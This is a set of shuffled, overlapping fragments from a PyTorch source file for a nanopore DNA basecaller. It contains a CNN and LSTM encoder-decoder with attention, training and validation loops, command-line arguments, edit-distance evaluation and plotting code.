"train_ds[4] read_train = train_ds[5] #Get training data train_loader = get_train_loader_trainVal(input_x, signal_len, input_y, label_len,",
"#print(true_y_len, true_y_len.size()) input_decoder = input_decoder[not_padded_batches, :] # get only batches that are NOT",
"model(inputs_val, seq_len_val, 0, labels_val, lab_len_val, labels10_val, labels_val.size(1), mode) output_val = torch.transpose(output_val, 0, 1).contiguous()",
"f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model",
"# ----------- # * CNN-Encoder # * LSTM-Encoder # * LSTM-Decoder # The",
"self.port=port self.attention = attention self.dropout = dropout # Define the LSTM layer if",
"and matrix_param[p].shape[1] == 1: # (256, 1, 11) m = matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else:",
"self.output_dim).cuda(self.port) # [max. target length, batch size, hidden dim] max_in_batch = int(max(true_y_len.cpu())) start_seq",
"EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \"\"\" import h5py import",
"init_hidden(self): # This is what we'll initialise our hidden state as return (torch.zeros(self.num_layers,",
"dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget,",
"acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation",
"out12[-1], 'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0],",
"torch.no_grad(): for iteration_val, data_val in enumerate(val_loader): batch_x_val = data_val[0] batch_y_val = data_val[1] seq_len_val",
"sgd = False out_classes = 5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True",
"torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x, x_lengths): #hidden = self.init_hidden() # Forward pass",
"len(p[epoch].detach().numpy())) # this locator puts ticks at regular intervals if epoch == 0:",
"3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend()",
":, i] # batch, features, seq len if self.attention: # ATTENTION MECHANISM attn_weights",
"layer self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p = nn.LSTM(self.input_dim,",
"unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx, :, :] return hidden_original, unpacked_original",
"Define the LSTM layer lstm_out, hidden = self.lstm(packed_seq) # [seq_len, batch, input_dim] #",
"= data_val[2] lab_len_val = data_val[3] batch_y10_val = data_val[4] inputs_val, labels_val, labels10_val = Variable(batch_x_val,",
"ord=2) # cell gate start, end = n//2, n//2 + n//4 input_biases[idx_b+2, idx]",
"max_idx_val)) f.close() def basecalling(argv): parser = make_argparser() args = parser.parse_args(argv[1:]) infile = args.input",
"value CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization,",
":]#.gather(0, unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx, :, :] return hidden_original,",
"training iteration: print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs) print(\"gradient clipping=\", clipping_value) print(\"teacher",
"default=False) # LSTM arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('--dropout', type=float, default=Range(0.0,",
"print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs) print(\"gradient clipping=\", clipping_value) print(\"teacher forcing ratio=\",",
"dict_validation_acc2[updates] = np.mean(val_acc) valid_loss = running_loss_val / float(iteration_val + 1) running_loss_train = 0.0",
"input_dim] def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_encoder = False, bidirectional=False, port=1,",
"0 epoch_editd_val = 0 epoch_editd = 0 print(\"=\" * 30) print(\"epoch {}/{}\".format(epoch+1, n_epochs))",
"n//2, n # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) if forget_bias_decoder",
"3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit distance\") if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit distance\")",
"= fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error",
"dict_gradients]]) def count_parameters(model): return sum(p.numel() for p in model.parameters() if p.requires_grad) def init_weights_orthogonal_lstm(m):",
"= 32 is a good default value CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] ,",
"= ed2 # epoch_editd += ed # running_editd_train += ed # editd_iteration.append(ed2) #",
"# shape of self.hidden: (a, b), where a and b both have shape",
"= 5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True # Load data dict_classes",
"\"w\") if editD: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings",
"help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int, default=[11, 11, 11], help=\"Kernel sizes in Encoder-CNN\")",
"hidden h = h.view(h.size(0), -1) c = c.view(c.size(0), -1) x = x.view(x.size(0), -1)",
"cellgate = F.tanh(cellgate) outgate = F.sigmoid(outgate) cy = (forgetgate * c) + (ingate",
"initialize the early_stopping object early_stopping = EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in",
"self.lstm_encoder = lstm_encoder self.lstm_decoder = lstm_decoder assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden dimensions of",
"f = open(fname, \"w\") if editD: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation",
"########################################### #### sort by decreasing target length sorted_len_target, sorted_idx_target = lab_len.sort(0, descending=True) sorted_hiddens1",
"decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\") # early",
"name: for b in [\"input\", \"forget\", \"cell\", \"output\"]: y_len_biases.append(name + \".\" + b)",
"plot_error_accuarcy(input, pdf=None, steps=50, validation=True, editD=True): sns.set(font_scale=1) loss_train, loss_val, acc_train, acc_val, editd_train, editd_val =",
"to the LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) # Define the LSTM layer",
"else: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train],",
"default=\"0\", help=\"Set forget gate bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False)",
"self.bidirectional = bidirectional self.port=port self.attention = attention self.dropout = dropout # Define the",
"cer, updates) #dict_training_editd2[updates] = running_editd_train #/ float(make_validation) dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration)",
"+= ed_val total_num_chars += num_char_ref if editD: cer = float(total_ed) / total_num_chars if",
"weight_decay=weight_decay, betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has {count_parameters(model12):,} trainable parameters') f =",
"make_validation == 0): # or (updates == n_epochs-1)): if reduced_TF: #if updates >",
"= labels10[sorted_idx_target, :, :] # batch, out_size, seq_len ########################################### ##### Decoder ############################# ###########################################",
"= read_data[0] val_set = read_data[1] train_set = [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)]",
"i in max_for: # Stop looping if we got to the last element",
"/ reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc running_acc_train += acc acc_iteration.append(acc) #if editD: # if",
"top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\") if",
"# ----------- class Seq2Seq(nn.Module): def __init__(self, cnn_encoder, lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder = cnn_encoder",
"= pred[idx] seq_target = target[idx] encoded_pred = [] for p in seq: if",
"BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED",
"#self.attn = nn.Linear(self.hidden_dim * 4, self.hidden_dim * 2) self.linear = nn.Linear(self.hidden_dim*2, self.output_dim) else:",
"label_len_val = val_ds[4] read_val = val_ds[5] input_x = train_ds[0] input_y = train_ds[1] input_y10",
"and b both have shape (num_layers, batch_size, hidden_dim). if self.bidirectional: hidden1 = hidden[0]",
"running_loss_val += loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val",
"strtobool from polyleven import levenshtein sys.path.insert(0, '/basecaller-modules') from early_stopping import EarlyStopping from cnn",
"labels, labels10 = Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False) # batch_size x out_size",
"teacher_forcing_ratio # Evaluation on the validation set val_losses = [] val_acc = []",
"running_editd_val = 0.0 print(\"=\" * 100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss / float(iteration",
"= F.sigmoid(outgate) cy = (forgetgate * c) + (ingate * cellgate) hy =",
"LSTM layer # shape of lstm_in: [batch, input_dim] # shape of lstm_out: [seq_len,",
"units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number of layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str,",
"OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE",
"max_idx_val)) else: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train],",
"torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_decoder = False,",
"optimizer.zero_grad() batch_x = data[0] batch_y = data[1] seq_len = data[2] lab_len = data[3]",
"% make_validation == 0: # ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) # ed2 =",
"self.init_hidden() # Forward pass through LSTM layer # shape of lstm_in: [batch, seq_len,",
"dropout_on = args.dropout_cnn dropout_input = args.dropout_input dropout_probability = args.drop_prob call = args.call lr",
"1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long())",
"# forget gate start, end = n//4, n//2 input_biases[idx_b+1, idx] = np.linalg.norm(m[start: end],",
"self.hidden_size = hidden_size self.bias = bias self.i2h = nn.Linear(input_size, 4 * hidden_size, bias=bias)",
"def make_argparser(): parser = argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input', required = True, help=\"File path",
"{} dict_training_loss2 = {} dict_validation_loss2 = {} dict_training_acc2 = {} dict_validation_acc2 = {}",
"= c.view(x.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings gates = self.i2h(x)",
"batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def get_train_loader(tensor_x, sig_len, tensor_y,",
"lab_len = data[3] batch_y10 = data[4] #Wrap them in a Variable object inputs,",
"{0:.4f}\".format((epoch_editd / float(iteration + 1)))) if updates % make_validation == 0: print(\"=\" *",
"if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit distance\") if",
"gate start, end = n//2 + n//4, n input_biases[idx_b+3, idx] = np.linalg.norm(m[start: end],",
"= args.attention dropout = args.dropout # CNN input_bias_cnn = args.input_bias_cnn strides = args.strides",
"# [batch, seq_len, input_dim] # pack_padded_sequence so that padded items in the sequence",
"\"<PAD>\"} # A=0, C=1, G=2, T=3, EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__')) # script directory",
"(h1, h2) batch_size = true_y_len.size(0) max_for = range(max_label_len) outputs = torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port)",
"= float(total_ed) / total_num_chars if updates == 0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses),",
"ord=2) if split_LSTMbiases and \"bias\" in p and \"lstm\" in p and \"linear\"",
"'--hidden_units', type=int, default=256, help=\"Number of hidden units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number",
"args.early_stop patience_earlyStop = args.patience weight_decay = args.weight_decay #0.01 #0.01 clipping_value = args.gradient_clip #",
"number of layers!\" assert lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder and decoder must have equal",
"plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from validation set\") if editD:",
"= val_ds[2] signal_len_val = val_ds[3] label_len_val = val_ds[4] read_val = val_ds[5] input_x =",
"in enumerate(target_lengths): length = int(length.item()) seq = pred[idx] seq_target = target[idx] encoded_pred =",
"start = time.time() out12 = trainNet( model12, train_ds = train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value,",
"not in p: n = matrix_param[p].shape[0] # input gate start, end = 0,",
"one-hot encoden reshaped_output = output.view(-1, output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels !=",
"self.bidirectional = bidirectional self.port = port self.dropout=dropout # Define the LSTM layer self.lstm",
"early_stopping object early_stopping = EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in = {}",
"= open(fname, \"w\") if editD: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings",
"parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) return",
"All rights reserved. Redistribution and use in source and binary forms, with or",
">= true seq length if i >= true_y_len[-1].item() and len(true_y_len) > 1: not_padded_batches",
"editD: # if updates % make_validation == 0: # ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels,",
"from sklearn.preprocessing import OneHotEncoder from torch.utils.tensorboard import SummaryWriter import itertools import seaborn as",
"'--gpu_port', type=int, default=1, help=\"Port on GPU mode\") parser.add_argument('-s', '--set_seed', type=int, default=1234, help=\"Set seed\")",
"output dim] top1 = input_decoder.argmax(1) # get argmax of prediction #if teacher forcing,",
"f.write(infile + \" \\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue",
"torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def get_train_loader(tensor_x, sig_len,",
"len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend()",
"hidden_size, bias=bias) # self.reset_parameters() def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w",
"encoded_target) editd += result num_chars += len(encoded_target) return editd, num_chars def trainNet(model, train_ds,",
"* 100), \"Val Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val + 1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val /",
"bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\")",
"plt.title(\"Accuracy vs. updates\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training",
"self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted, random_value, mode_type, beam_width) #",
"your choosing if clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update encoder and decoder",
"= fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit",
"padded items in the sequence won't be shown to the LSTM packed_seq =",
"== lstm_decoder.batch_size, \"Encoder and decoder must have equal batch size!\" def forward(self, inputs,",
"gate\", \"cell activation\", \"out gate\"]): i += 1 ax = fig.add_subplot(2, 2, i)",
"= 0.0 updates = 0 heatmap_g = None heatmap_w = None heatmap_g_b =",
"n//2 + n//4, n input_biases[idx_b+3, idx] = np.linalg.norm(m[start: end], ord=2) idx_b += 4",
"train_ds[2] signal_len = train_ds[3] label_len = train_ds[4] read_train = train_ds[5] #Get training data",
"cellgate) hy = outgate * F.tanh(cy) #print(\"hy\", hy.size()) hy = torch.unsqueeze(hy, 0).cuda(self.port) #",
"updates = 0 heatmap_g = None heatmap_w = None heatmap_g_b = None heatmap_w_b",
"2: \"G\", 3: \"T\", 4: \"<EOF>\", 5: \"<PAD>\"} # A=0, C=1, G=2, T=3,",
"lstm_encoder = lstm, lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name, param in model12.named_parameters(): if",
"print(\"validation: \", val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size()) # [batch size] is typically",
"== lstm_decoder.hidden_dim, \"Hidden dimensions of encoder and decoder must be equal!\" assert lstm_encoder.num_layers",
"hiddens original_idx = original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:, original_idx,",
"in list(acc_train.values())], label=\"training accuracy\") if validation: ax.plot(list(acc_val.keys()), [v*100 for v in list(acc_val.values())], label=\"validation",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases = False): x_len",
"mode\") parser.add_argument('-s', '--set_seed', type=int, default=1234, help=\"Set seed\") parser.add_argument('-b', '--batch_size', type=int, default=256, help=\"Batch size\")",
"1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\") if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\")",
"convert_to_string(pred, target, target_lengths): import editdistance vocab = {0: \"A\", 1: \"C\", 2: \"G\",",
"= 0 epoch_editd_val = 0 epoch_editd = 0 print(\"=\" * 30) print(\"epoch {}/{}\".format(epoch+1,",
"super().__init__() self.cnn_encoder = cnn_encoder self.lstm_encoder = lstm_encoder self.lstm_decoder = lstm_decoder assert lstm_encoder.hidden_dim ==",
"vs. updates\") ax = fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()), [v*100 for v in list(acc_train.values())],",
"const=True, default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?',",
"# attention self.attn = nn.Linear(self.hidden_dim * 4, 1) #self.attn = nn.Linear(self.hidden_dim * 4,",
"of prediction #if teacher forcing, use actual next token as next input #if",
"30) total_train_loss = 0 loss_iteration = [] acc_iteration = [] editd_iteration = []",
"half of the updates teacher_forcing_ratio = teacher_forcing_ratio * 0.95 else: teacher_forcing_ratio # Evaluation",
"bias=bias) self.port = port def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w",
"math.sqrt(self.hidden_size) for w in self.parameters(): w.data.uniform_(-std, std) def forward(self, x, hidden): h, c",
"CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;",
"val_ds != None: val_loader = get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val, input_y10_val, batch_size=batch_size, shuffle=True) if",
"{} dict_activations_out_decoder = {} dict_training_loss = {} dict_validation_loss = {} dict_training_acc = {}",
"f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model has {:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={},",
"hidden_size, bias=bias) self.port = port def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for",
"= train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds = val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path",
"1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOF>\", 5: \"<PAD>\"} # A=0, C=1,",
"ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation",
"if forget_bias != \"None\" and \"lstm_encoder\" in name: print(name,param.data.size()) n = param.size(0) #",
"0 epoch_acc_val = 0 epoch_editd_val = 0 epoch_editd = 0 print(\"=\" * 30)",
"wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\") if validation: ax.plot(list(loss_val.keys()),",
"= nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers,",
"= np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) # ed2 = ed # else: # ed =",
"x.gather(0, index_sorted_idx.long()) # [batch, seq_len, input_dim] # pack_padded_sequence so that padded items in",
"type in Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int, default=[1, 1, 1], help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel',",
"val_editd = [] model.eval() total_ed = 0 total_num_chars = 0 with torch.no_grad(): for",
":] # [batch, seq_len, input_dim] lab_len = lab_len[negative_idx] labels = labels[negative_idx, :] labels10",
"y_len_biases] df_b = pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\")",
"[batch size] is typically chosen between 1 and a few hundreds, e.g. [batch",
"= val_acc if editD: dict_validation_editd[epoch] = val_editd # early_stopping needs the validation loss",
"f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\")",
"forgetgate = F.sigmoid(forgetgate) cellgate = F.tanh(cellgate) outgate = F.sigmoid(outgate) cy = (forgetgate *",
"permitted provided that the following conditions are met: 1. Redistributions of source code",
"# ingate start, end = 0, n//4 # ordering ingate, forgetgate, cellgate, outgate",
"beam_width=1): ########################################### ##### Encoder ############################# ########################################### #### CNN #Forward pass, backward pass, optimize",
"False, port=1, attention=True, dropout=0): super(LSTMdecoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size",
"PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR",
"range(max_label_len) outputs = torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) # [max. target length, batch size, hidden",
"gate bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # teacher forcing",
"class Seq2Seq(nn.Module): def __init__(self, cnn_encoder, lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder = cnn_encoder self.lstm_encoder =",
"input_size #### LSTM if (seq_len_cnn <= 0.).sum().item() > 0: # remove neagtive samples",
"lstm, lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name, param in model12.named_parameters(): if \"bias\" in",
"for x in y_len] df = pd.DataFrame(input, index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm =",
"title=\"\"): sns.set(font_scale=1) fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.5) i =",
"editD: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation",
"target length, batch size, output dim] top1 = input_decoder.argmax(1) # get argmax of",
"in %\") plt.legend() plt.title(\"Accuracy vs. updates\") if editD: ax = fig.add_subplot(1, 3, 3)",
"[] val_editd = [] model.eval() total_ed = 0 total_num_chars = 0 with torch.no_grad():",
"= 0 for p, label in zip(input, [\"input gate\", \"forget gate\", \"cell activation\",",
"help=\"Number of hidden units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number of layers in",
"import os import sys import torch import torch.nn as nn from torch.autograd import",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--patience', type=int, default=25, help=\"Patience in early stopping\") parser.add_argument(\"--call\",",
"sorted_idx = x_lengths.sort(0, descending=True) index_sorted_idx = sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs = x.gather(0, index_sorted_idx.long())",
"#decide if we are going to use teacher forcing or not teacher_force =",
"[val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \", train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(),",
"p in seq: if p == 4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred) encoded_target",
"f = open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile + \" \\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue",
"# pack_padded_sequence so that padded items in the sequence won't be shown to",
"for p, label in zip(input, [\"input gate\", \"forget gate\", \"cell activation\", \"out gate\"]):",
"editd_val = input[0], input[1], input[2], input[3], input[4], input[5] max_idx_train = max(acc_train, key=lambda k:",
"batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional = bidir, port=port, dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim",
"print(start, end) if forget_bias_decoder != \"None\" and \"lstm_decoder\" in name and \"linear\" not",
"= 0 old_ed = 0 if reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for",
"in source and binary forms, with or without modification, are permitted provided that",
"in name and len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None, steps=50, validation=True, editD=True):",
"f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\")",
"batch shape for input x is [batch, seq_len, input_dim] def __init__(self, input_dim, hidden_dim,",
"labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1): ########################################### ##### Encoder ############################# ########################################### #### CNN #Forward pass,",
"\"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration + 1)) * 100), \"Val Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val",
"= nn.Linear(self.hidden_dim * 2, self.hidden_dim) self.linear = nn.Linear(self.hidden_dim, self.output_dim) def forward(self, encoder_outputs, true_x_len,",
